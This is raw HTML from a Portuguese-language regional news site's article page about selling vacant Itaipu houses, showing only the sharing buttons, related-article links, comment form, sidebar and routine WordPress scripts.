target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-32711" class="share-skype sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-32711" class="share-linkedin sd-button share-icon no-text" href="https://iguassunews.com/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-12891280-32711-6055cd55f147f' data-src='https://widgets.wp.com/likes/#blog_id=12891280&amp;post_id=32711&amp;origin=iguassunews.com&amp;obj_id=12891280-32711-6055cd55f147f' data-name='like-post-frame-12891280-32711-6055cd55f147f'><h3 class="sd-title">Curtir isso:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Curtir</span></span> <span class="loading">Carregando...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-22357 post type-post status-publish format-standard has-post-thumbnail hentry category-foz tag-cataratas tag-chico-brasileiro tag-corona tag-covid tag-itaipu tag-manchete1 tag-pandemia tag-pmfi">
	<div class="content-thumb content-grid-thumb">
		<a href="https://iguassunews.com/foz-do-iguacu-mais-3-mortes-apos-afrouxamento-de-restricoes-contra-covid-19/" title="Foz do Iguaçu: MAIS 3 MORTES APÓS AFROUXAMENTO DE RESTRIÇÕES CONTRA COVID-19"><img width="180" height="101" src="https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=180%2C101&amp;ssl=1" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=777%2C437&amp;ssl=1 777w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=180%2C101&amp;ssl=1 180w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=260%2C146&amp;ssl=1 260w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=373%2C210&amp;ssl=1 373w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?resize=120%2C67&amp;ssl=1 120w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?zoom=3&amp;resize=180%2C101 540w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="22358" data-permalink="https://iguassunews.com/foz-do-iguacu-mais-3-mortes-apos-afrouxamento-de-restricoes-contra-covid-19/foz-capa/" data-orig-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?fit=1500%2C1125&amp;ssl=1" data-orig-size="1500,1125" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="foz capa" data-image-description="" data-medium-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?fit=300%2C225&amp;ssl=1" data-large-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2020/08/foz-capa.png?fit=1024%2C768&amp;ssl=1" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://iguassunews.com/category/foz/" rel="category tag">Foz do Iguaçu</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://iguassunews.com/foz-do-iguacu-mais-3-mortes-apos-afrouxamento-de-restricoes-contra-covid-19/" title="Foz do Iguaçu: MAIS 3 MORTES APÓS AFROUXAMENTO DE RESTRIÇÕES CONTRA COVID-19" rel="bookmark">
			Foz do Iguaçu: MAIS 3 MORTES APÓS AFROUXAMENTO DE RESTRIÇÕES CONTRA COVID-19		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-28831 post type-post status-publish format-standard has-post-thumbnail hentry category-meio-ambiente category-parana category-responsabilidade-social tag-itaipu tag-joaquim-silva-e-luna tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="https://iguassunews.com/meio-ambiente-legado-verde-em-dez-anos-itaipu-plantou-quase-775-mil-mudas-de-arvores/" title="MEIO AMBIENTE &#8211; LEGADO VERDE: EM DEZ ANOS, ITAIPU PLANTOU QUASE 775 MIL MUDAS DE ÁRVORES"><img width="180" height="101" src="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=180%2C101&amp;ssl=1" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=777%2C437&amp;ssl=1 777w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=180%2C101&amp;ssl=1 180w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=260%2C146&amp;ssl=1 260w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=373%2C210&amp;ssl=1 373w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?resize=120%2C67&amp;ssl=1 120w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?zoom=3&amp;resize=180%2C101 540w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="28832" data-permalink="https://iguassunews.com/meio-ambiente-legado-verde-em-dez-anos-itaipu-plantou-quase-775-mil-mudas-de-arvores/silva-e-luna-planta/" data-orig-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?fit=780%2C520&amp;ssl=1" data-orig-size="780,520" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="SILVA E LUNA PLANTA" data-image-description="" data-medium-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?fit=300%2C200&amp;ssl=1" data-large-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/SILVA-E-LUNA-PLANTA.jpg?fit=780%2C520&amp;ssl=1" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://iguassunews.com/category/meio-ambiente/" rel="category tag">Meio Ambiente</a>, <a href="https://iguassunews.com/category/parana/" rel="category tag">Paraná</a>, <a href="https://iguassunews.com/category/responsabilidade-social/" rel="category tag">Responsabilidade Social</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://iguassunews.com/meio-ambiente-legado-verde-em-dez-anos-itaipu-plantou-quase-775-mil-mudas-de-arvores/" title="MEIO AMBIENTE &#8211; LEGADO VERDE: EM DEZ ANOS, ITAIPU PLANTOU QUASE 775 MIL MUDAS DE ÁRVORES" rel="bookmark">
			MEIO AMBIENTE &#8211; LEGADO VERDE: EM DEZ ANOS, ITAIPU PLANTOU QUASE 775 MIL MUDAS DE ÁRVORES		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-7559 post type-post status-publish format-standard has-post-thumbnail hentry category-foz tag-cataratas tag-cudad-del-este tag-foz-do-iguacu tag-futsal tag-iguassu-falls tag-iguazu tag-itaipu tag-parana tag-serie-ouro">
	<div class="content-thumb content-grid-thumb">
		<a href="https://iguassunews.com/foz-cataratas-futsal-enfrenta-o-umuarama-neste-sabado/" title="FOZ CATARATAS FUTSAL ENFRENTA O UMUARAMA NESTE SÁBADO"><img width="180" height="101" src="https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=180%2C101&amp;ssl=1" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=777%2C437&amp;ssl=1 777w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=180%2C101&amp;ssl=1 180w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=260%2C146&amp;ssl=1 260w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=373%2C210&amp;ssl=1 373w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?resize=120%2C67&amp;ssl=1 120w, https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?zoom=3&amp;resize=180%2C101 540w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="7561" data-permalink="https://iguassunews.com/foz-cataratas-futsal-enfrenta-o-umuarama-neste-sabado/foz-cataratas-x-umuarama9554/" data-orig-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?fit=1280%2C1067&amp;ssl=1" data-orig-size="1280,1067" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Foz Cataratas x Umuarama[9554]" data-image-description="" data-medium-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?fit=300%2C250&amp;ssl=1" data-large-file="https://i2.wp.com/iguassunews.com/wp-content/uploads/2018/05/Foz-Cataratas-x-Umuarama9554.jpeg?fit=1024%2C854&amp;ssl=1" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://iguassunews.com/category/foz/" rel="category tag">Foz do Iguaçu</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://iguassunews.com/foz-cataratas-futsal-enfrenta-o-umuarama-neste-sabado/" title="FOZ CATARATAS FUTSAL ENFRENTA O UMUARAMA NESTE SÁBADO" rel="bookmark">
			FOZ CATARATAS FUTSAL ENFRENTA O UMUARAMA NESTE SÁBADO		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-31705 post type-post status-publish format-standard has-post-thumbnail hentry category-foz tag-aquafoz tag-itaipu tag-parque-nacional-do-iguacu tag-turismo">
	<div class="content-thumb content-grid-thumb">
		<a href="https://iguassunews.com/atrativo-foz-do-iguacu-vai-ganhar-superaquario-com-especies-de-peixes-nativos/" title="Terra das Cataratas: FOZ DO IGUAÇU VAI GANHAR &#8220;SUPERAQUÁRIO&#8221; COM ESPÉCIES DE PEIXES NATIVOS"><img width="180" height="101" src="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=180%2C101&amp;ssl=1" class="attachment-content-grid size-content-grid wp-post-image" alt="" loading="lazy" srcset="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=777%2C437&amp;ssl=1 777w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=180%2C101&amp;ssl=1 180w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=260%2C146&amp;ssl=1 260w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=373%2C210&amp;ssl=1 373w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?resize=120%2C67&amp;ssl=1 120w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?zoom=3&amp;resize=180%2C101 540w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="28114" data-permalink="https://iguassunews.com/pandemia-producao-da-sputnik-v-no-brasil-comeca-dia-15-mas-doses-serao-exportadas/parque-naciona-l-anicersario-pni-catararas-foz/" data-orig-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?fit=1078%2C655&amp;ssl=1" data-orig-size="1078,655" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1610031842&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="parque naciona l- anicersario pni catararas foz" data-image-description="" data-medium-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?fit=300%2C182&amp;ssl=1" data-large-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/parque-naciona-l-anicersario-pni-catararas-foz.jpg?fit=1024%2C622&amp;ssl=1" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://iguassunews.com/category/foz/" rel="category tag">Foz do Iguaçu</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://iguassunews.com/atrativo-foz-do-iguacu-vai-ganhar-superaquario-com-especies-de-peixes-nativos/" title="Terra das Cataratas: FOZ DO IGUAÇU VAI GANHAR &#8220;SUPERAQUÁRIO&#8221; COM ESPÉCIES DE PEIXES NATIVOS" rel="bookmark">
			Terra das Cataratas: FOZ DO IGUAÇU VAI GANHAR &#8220;SUPERAQUÁRIO&#8221; COM ESPÉCIES DE PEIXES NATIVOS		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "Imóveis desocupados: EDITAL PARA VENDA DE CASAS DA ITAIPU DEVE SER PUBLICADO AINDA NESTE SEMESTRE"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="https://iguassunews.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='32711' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="97943d5c43" /></p><input type="hidden" id="ak_js" name="ak_js" value="150"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="https://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>		<label class="screen-reader-text" for="archives-dropdown-2">Arquivos</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Selecionar o mês</option>
				<option value='https://iguassunews.com/2021/03/'> março 2021 </option>
	<option value='https://iguassunews.com/2021/02/'> fevereiro 2021 </option>
	<option value='https://iguassunews.com/2021/01/'> janeiro 2021 </option>
	<option value='https://iguassunews.com/2020/12/'> dezembro 2020 </option>
	<option value='https://iguassunews.com/2020/11/'> novembro 2020 </option>
	<option value='https://iguassunews.com/2020/10/'> outubro 2020 </option>
	<option value='https://iguassunews.com/2020/09/'> setembro 2020 </option>
	<option value='https://iguassunews.com/2020/08/'> agosto 2020 </option>
	<option value='https://iguassunews.com/2020/07/'> julho 2020 </option>
	<option value='https://iguassunews.com/2020/04/'> abril 2020 </option>
	<option value='https://iguassunews.com/2020/03/'> março 2020 </option>
	<option value='https://iguassunews.com/2019/12/'> dezembro 2019 </option>
	<option value='https://iguassunews.com/2019/11/'> novembro 2019 </option>
	<option value='https://iguassunews.com/2019/10/'> outubro 2019 </option>
	<option value='https://iguassunews.com/2019/09/'> setembro 2019 </option>
	<option value='https://iguassunews.com/2019/08/'> agosto 2019 </option>
	<option value='https://iguassunews.com/2019/07/'> julho 2019 </option>
	<option value='https://iguassunews.com/2019/06/'> junho 2019 </option>
	<option value='https://iguassunews.com/2019/05/'> maio 2019 </option>
	<option value='https://iguassunews.com/2019/04/'> abril 2019 </option>
	<option value='https://iguassunews.com/2019/03/'> março 2019 </option>
	<option value='https://iguassunews.com/2019/02/'> fevereiro 2019 </option>
	<option value='https://iguassunews.com/2019/01/'> janeiro 2019 </option>
	<option value='https://iguassunews.com/2018/12/'> dezembro 2018 </option>
	<option value='https://iguassunews.com/2018/11/'> novembro 2018 </option>
	<option value='https://iguassunews.com/2018/10/'> outubro 2018 </option>
	<option value='https://iguassunews.com/2018/09/'> setembro 2018 </option>
	<option value='https://iguassunews.com/2018/08/'> agosto 2018 </option>
	<option value='https://iguassunews.com/2018/07/'> julho 2018 </option>
	<option value='https://iguassunews.com/2018/06/'> junho 2018 </option>
	<option value='https://iguassunews.com/2018/05/'> maio 2018 </option>
	<option value='https://iguassunews.com/2018/04/'> abril 2018 </option>
	<option value='https://iguassunews.com/2018/03/'> março 2018 </option>
	<option value='https://iguassunews.com/2018/02/'> fevereiro 2018 </option>
	<option value='https://iguassunews.com/2018/01/'> janeiro 2018 </option>
	<option value='https://iguassunews.com/2017/12/'> dezembro 2017 </option>
	<option value='https://iguassunews.com/2017/11/'> novembro 2017 </option>
	<option value='https://iguassunews.com/2017/10/'> outubro 2017 </option>
	<option value='https://iguassunews.com/2017/09/'> setembro 2017 </option>
	<option value='https://iguassunews.com/2017/08/'> agosto 2017 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4><form action="https://iguassunews.com" method="get"><label class="screen-reader-text" for="cat">Categorias</label><select  name='cat' id='cat' class='postform' >
	<option value='-1'>Selecionar categoria</option>
	<option class="level-0" value="7">Argentina</option>
	<option class="level-0" value="4">Brasil</option>
	<option class="level-0" value="9">Colunas</option>
	<option class="level-1" value="19">&nbsp;&nbsp;&nbsp;Blogsfera News</option>
	<option class="level-1" value="839">&nbsp;&nbsp;&nbsp;Caio Gottlieb</option>
	<option class="level-1" value="17">&nbsp;&nbsp;&nbsp;É Direito</option>
	<option class="level-1" value="725">&nbsp;&nbsp;&nbsp;Espaço Cristão</option>
	<option class="level-1" value="10">&nbsp;&nbsp;&nbsp;Nossa Voz</option>
	<option class="level-0" value="312">Economia</option>
	<option class="level-0" value="702">Espaço Cristão</option>
	<option class="level-0" value="866">Esporte</option>
	<option class="level-0" value="1">Extra</option>
	<option class="level-0" value="6">Foz do Iguaçu</option>
	<option class="level-0" value="864">Infraestrutura</option>
	<option class="level-0" value="14">Internacional</option>
	<option class="level-0" value="12">Latinoamerica</option>
	<option class="level-0" value="858">Meio Ambiente</option>
	<option class="level-0" value="868">Mercosul</option>
	<option class="level-0" value="865">Pandemia</option>
	<option class="level-0" value="8">Paraguay</option>
	<option class="level-0" value="5">Paraná</option>
	<option class="level-0" value="308">Política</option>
	<option class="level-0" value="860">Responsabilidade Social</option>
	<option class="level-0" value="863">Saúde</option>
	<option class="level-0" value="856">Tecnologia</option>
	<option class="level-0" value="859">Terceiro Setor</option>
	<option class="level-0" value="370">Tríplice Fronteira</option>
	<option class="level-0" value="857">Turismo</option>
	<option class="level-0" value="703">Última Hora</option>
</select>
</form>
<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			dropdown.parentNode.submit();
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

			</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2021 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/iguassunews.com\/imoveis-desocupados-edital-para-venda-de-casas-da-itaipu-deve-ser-publicado-ainda-neste-semestre\/":32711};
	</script>
				<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/postmessage.min.js' id='postmessage-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/jquery.jetpack-resize.min.js' id='jetpack_resize-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/likes/queuehandler.min.js' id='jetpack_likes_queuehandler-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/wp-embed.min.js' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='https://iguassunews.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.9' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/sharedaddy/sharing.min.js' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-twitter' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-facebook' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-telegram' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-telegram' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-skype' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-skype' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
